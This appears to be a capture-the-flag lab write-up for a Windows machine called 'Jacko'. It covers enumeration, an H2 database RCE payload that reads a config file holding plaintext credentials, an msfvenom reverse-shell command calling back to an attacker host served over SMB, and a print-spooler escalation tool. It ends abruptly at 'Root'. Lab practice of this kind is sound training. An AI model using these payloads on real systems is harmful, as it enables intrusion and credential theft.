🪟Jacko

IP: 192.168.65.66

Enumeration

Nmap scan

nmap 192.168.65.66 -sV -p- -A 

Service Enumeration

TCP/80

TCP/135

TCP/139/445

Went back and tried to connect to the shares with tony's credentials but neither shared worked.

TCP/7680

TCP/8082

The credentials already in the form will work to log in, just hit connect.

Found tony as username.

LFI

Found version numbers.

Found exploit in exploit-db for this exact version. https://www.exploit-db.com/exploits/49384 Confirmed RCE.

Found some credentials in wrapper.conf

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c type wrapper.conf").getInputStream()).useDelimiter("\\Z").next()');

Found tony's credentials. wrapper.ntservice.account=.\tony wrapper.ntservice.password=BeyondLakeBarber399

Had to get a hint here as none of the shells I kept trying worked and had to look at two or three different methods in different walk throughs.

Created reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.65 LPORT=8082 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o revshell.exe

Hosted it via SMB.

sudo smbserver.py -smb2support Share $PWD

Ran my listener and got a shell.

Fixed path because only few commands were running.

set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

Possible printspooler lpe.

I believe this may be vulnerable to a printer nightmare attack. Curled printspoofer.exe to tony's desktop. https://github.com/dievus/printspoofer

Root

Last updated

Was this helpful?